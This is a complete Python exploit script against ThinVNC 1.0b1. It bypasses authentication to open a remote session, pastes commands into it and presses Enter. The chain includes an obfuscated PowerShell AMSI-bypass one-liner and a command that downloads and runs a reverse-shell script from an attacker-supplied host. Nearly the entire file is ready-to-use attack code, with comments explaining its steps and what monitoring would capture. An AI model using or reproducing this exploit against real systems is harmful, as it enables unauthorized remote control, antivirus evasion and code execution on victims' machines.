import requests
import time
import argparse
import sys
import base64

'''
    Title: ThinVNC 1.0b1 - Authentication Bypass to RCE
    Author: krill-x7
'''

'''
You need to create and host a file called rev.ps1 on your attack machine which contains the powershell reverse shell payload that would be executed on the target. 
'''

# Command-line interface. Only -t is mandatory; the other three options
# have no default, so when they are omitted argparse leaves the attribute
# as None and it is interpolated literally (e.g. 'http://HOST:None').
parser = argparse.ArgumentParser(
    description="ThinVNC 1.0b1 - Authentication Bypass to RCE Exploit"
)
for flag, dest_name, help_text, is_required in (
    ('-t', 'target', 'Target ip address', True),
    ('-tp', 'port', 'Target port', False),
    ('-a', 'atk_ip', 'Attacker ip address', False),
    ('-ap', 'atk_port', 'Attacker port', False),
):
    parser.add_argument(flag, dest=dest_name, help=help_text, required=is_required)

args = parser.parse_args()

# Base URL for every /cmd request below; plain HTTP, scheme is not configurable.
target = f'http://{args.target}:{args.port}'

# Static request headers reused by every call. The User-Agent mimics a
# desktop Firefox 98 build; "Connection: close" means one TCP connection
# per request, which is what a network capture of this tool would show.
headers = dict([
    ("User-Agent", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"),
    ("Accept", "*/*"),
    ("Accept-Language", "en-US,en;q=0.5"),
    ("Accept-Encoding", "gzip, deflate"),
    ("X-Requested-With", "XMLHttpRequest"),
    ("Connection", "close"),
])


#endpoint_get_sid = '/cmd?cmd=connect&destAddr=poc&id=0'
#endpoint_start_sid = f'/cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id={sid}'
#endpoint_send_ctlEsc = f'/cmd?cmd=fkey&key=CtrlEsc&id={sid}'
#endpoint_send_cmd = f'/cmd?id={sid}&cmd=cli&type=clipboard&action=paste'
#endpoint_send_enter = f'/cmd?cmd=keyb&key=13&char=0&action=down&id={sid}'

# Shared cookie jar; SID starts empty and is filled in by get_sid() so that
# every later request carries the session id the server handed out.
cookies = dict(SID='')

def get_sid():
    """Obtain a session id from the target's /cmd endpoint.

    Issues the ``connect`` command with an empty SID cookie, reads the
    ``id`` field of the JSON reply, stores it in the module-level
    ``cookies`` dict under ``SID`` and returns it.

    No status-code check and no timeout are applied: a non-JSON reply
    raises from ``.json()`` and an unresponsive host blocks indefinitely.
    """
    connect_url = f"{target}/cmd?cmd=connect&destAddr=poc&id=0"
    reply = requests.get(connect_url, headers=headers, cookies=cookies)
    session_id = reply.json()['id']
    cookies['SID'] = session_id
    return session_id

def start_sid(sid):
    """Start session *sid* with mouse and keyboard control enabled.

    On a 200 reply a success line is printed and the function pauses for
    two seconds; any other status code is printed and the process exits.
    Note that ``sys.exit()`` is called with no argument, so the failure
    path still yields exit status 0 to the caller's shell.
    """
    start_url = (
        f"{target}/cmd?cmd=start&mouseControl=true&kbdControl=true"
        f"&quality=85&pixelFormat=0&monitor=0&id={sid}"
    )
    reply = requests.get(start_url, headers=headers, cookies=cookies)
    if reply.status_code == 200:
        print(f"[+] SID {sid} started successfully.")
        time.sleep(2)
        return
    print(f"[!] The server returned {reply.status_code}")
    sys.exit()
    
def send_ctrlEsc(sid):
    """POST a Ctrl+Esc function-key event to session *sid*.

    Exits the process (status 0) on any non-200 reply; otherwise prints
    progress lines separated by one-second pauses.
    """
    fkey_url = f"{target}/cmd?cmd=fkey&key=CtrlEsc&id={sid}"
    reply = requests.post(fkey_url, headers=headers, cookies=cookies)
    if reply.status_code != 200:
        print(f"[!] The server returned {reply.status_code}")
        sys.exit()
    print(f"\n[+] Sending Ctrl + Esc to {sid}")
    time.sleep(1)
    print("     -> sent")
    time.sleep(1)

def send_cmd(sid, cmd):
    """Paste *cmd* into session *sid* via the clipboard command, then press Enter.

    *cmd* is sent verbatim as the raw POST body. On a non-200 reply the
    status code is printed and the process exits (status 0); on success
    the command is echoed to stdout and ``send_enter`` is called after a
    one-second pause.
    """
    paste_url = f"{target}/cmd?id={sid}&cmd=cli&type=clipboard&action=paste"
    reply = requests.post(paste_url, headers=headers, cookies=cookies, data=cmd)
    if reply.status_code != 200:
        print(f"[!] The server returned {reply.status_code}")
        sys.exit()
    print(f"\n[+] Sending command: `{cmd}` to SID:{sid}")
    time.sleep(1)
    send_enter(sid)
    
def send_enter(sid):
    """Send a key-down event for Enter (key code 13) to session *sid*.

    Only the ``down`` action is sent; no matching ``up`` event follows.
    Exits the process (status 0) on a non-200 reply, otherwise prints a
    confirmation and pauses for two seconds.
    """
    enter_url = f"{target}/cmd?cmd=keyb&key=13&char=0&action=down&id={sid}"
    reply = requests.get(enter_url, headers=headers, cookies=cookies)
    if reply.status_code != 200:
        print(f"[!] The server returned {reply.status_code}")
        sys.exit()
    print("     -> sent")
    time.sleep(2)

def main():
    """Drive the full chain: obtain a session, start it, then inject keystrokes.

    Every step is an unauthenticated HTTP request to the target's /cmd
    endpoint; each helper exits the process on a non-200 reply. From a
    monitoring standpoint, the observable sequence is connect -> start ->
    fkey -> several clipboard pastes followed by Enter key events.
    """
    print("Welcome to the land of the living")
    sid = get_sid()
    start_sid(sid)
    send_ctrlEsc(sid)
    print("\ntime to chain")
    # Each send_cmd call pastes its argument and presses Enter.
    send_cmd(sid,'run')
    amsi_txt = """powershell.exe -exec bypass"""
    send_cmd(sid, amsi_txt)
    # Obfuscated PowerShell one-liner, sent verbatim. The variable name
    # suggests an AMSI-related step; not verified here. Script-block
    # logging on the target would capture the de-obfuscated form.
    amsi_txt = """S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )"""
    send_cmd(sid,amsi_txt)
    print("\n[+] Executing reverse shell payload ")
    # Fetches rev.ps1 over plain HTTP from the host given by -a/-ap and
    # evaluates it. -a and -ap have no defaults, so if either is omitted
    # the URL contains the literal text 'None'.
    shell = f"IEX((New-Object System.Net.WebClient).DownloadString('http://{args.atk_ip}:{args.atk_port}/rev.ps1'))"
    send_cmd(sid, shell)

            

if __name__ == "__main__":
    main()
    


# nothing happens here :)